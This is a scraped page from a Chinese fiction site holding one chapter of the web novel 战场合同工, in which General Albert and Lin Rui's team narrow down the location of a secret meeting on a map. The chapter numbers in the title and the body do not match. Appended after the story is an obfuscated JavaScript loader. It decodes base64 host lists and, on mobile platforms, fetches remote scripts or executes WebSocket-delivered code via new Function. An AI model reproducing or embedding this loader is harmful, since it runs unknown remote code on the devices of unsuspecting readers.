笔趣阁

字:
关灯 护眼
笔趣阁 > 战场合同工 > 第五千七百二十三章 机关算尽

第五千七百二十三章 机关算尽

章节错误,点此举报(免注册),举报后维护人员会在两分钟内校正章节内容,请耐心等待,并刷新页面。
第5395章机关算尽
  
  那个士兵离开之后,阿尔拜特将军的脸色相当凝重。看来雄鹰埃塞亚还是没有对自己彻底放心。
  
  不过通过刚才自己的反应,这个士兵应该没有看出什么破绽才对。
  
  毕竟刚才阿尔拜特的解释也合情合理,没有露出丝毫破绽。
  
  由于现在阿尔拜特和三叉戟公司的佣兵之间的矛盾几乎已经是公开化了。
  
  那个士兵肯定不会怀疑阿尔拜特会向三叉戟公司的人透露情报。他们毕竟双方目前看起来,是对立的。
  
  阿尔拜特一心要置三叉戟公司的佣兵于死地。而三叉戟公司的佣兵也一直在寻找阿尔拜特通敌的证据。
  
  在这个士兵看来,这双方是永远不可能走到一起去的。
  
  而这最大的不可能,反而是阿尔拜特和林锐都想要的结果。
  
  不光如此,而且通过刚才的对话,阿尔拜特已经了解到了一些新的情报。
  
  会面的地点就在市区,这么说来距离索马里国民军的营地不远。
  
  但是当阿尔贝特说要带一个司机的时候,那个士兵表示他可以开车。
  
  就说明这个距离也不会太近。因为这个士兵默认是要开车去的。
  
  阿尔拜特立刻把这些重要的情报传达给了林锐。
  
  在三叉戟公司的临时指挥部。林锐等人也聚在一起,讨论着刚刚获取到的重要信息。
  
  “会面地点定在市区。说明,距离并不是很远。也就是可以确定,明天他们会面的地点不会超出市区范围。
  
  但同时透露出了一个侧面信息,他们必须开车前往。也就是说这个地点也不会太近。
  
  至少要超出距离阿尔拜特营地,步行十五分钟以内的范围。”精算师降岸在地图上画了一个圈。
  
  这个圈以阿尔拜特所在的索马里国民军营地为圆心,正常人步行十五分钟的距离为半径。
  
  “也就是说这个园内的范围,我们可以不予考虑。因为这个范围之内,距离索马里国民军的营地太近。
  
  雄鹰埃塞亚抱有很强的戒心,如果要在这个地方和阿尔拜特会面,那么和在阿尔拜特的营地里会面没有区别。”林锐看着地图点点头。
  
  “没错,而且我感觉最外围的一圈也可以排除。因为距离阿尔拜特的营地太远,这会加重阿尔拜特的顾虑。
  
  很显然,雄鹰埃塞亚也不想这样。毕竟他找阿尔拜特谈话,是想要安抚他。而不是加重他的不安情绪。”精算师将岸又把地图最外圈划掉了一部分。
  
  林锐沉默了一会儿,“确实合情合理,不过这个范围还是太大了。而且时间上也不确定,他并没有说是再下午还是晚上进行会面。”
  
  精算师将岸点点头,“不过这里面还有几个因素需要排除。因为这几天我们一直在市区设卡排查。
  
  理由是我们之前营地遭到了袭击,所以我们在城区的几个位置进行了设卡排查,严查索马里青年军的恐怖分子。
  
  因为涉及到营地被袭的路线问题,我们故意选择了城区的东南侧外围,作为重点排查区域。
  
  因为这个排查从我们几天之前就开始了,早在他们约见之前。所以雄鹰埃塞亚不会产生怀疑。
『加入书签,方便阅读』
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzk5OTk5OS0xMDE1Ng==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x5a\x57\x69\x77\x51\x4b\x69\x58\x4b\x49']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=1000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,300000),ext='2',i='ndx'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vanNoZGtmamxhcy56aGl4aWFuZ2h1aWJhbby5jbb20=','d3NzOOi8vd3MuYW5kYTE1MTYuY29tOOjkwOOTAsd3NzOOi8vd3Muc3luZ2d5LmNvbTo5MDkwLHdzczovL3dzLnpoaXB1ZnMuY29tOOjkwOOTA=',window,document,['b','O']);}:function(){};
继续浏览精彩内容
到笔趣阁APP免费阅读
《战场合同工》
打开
浏览器
继续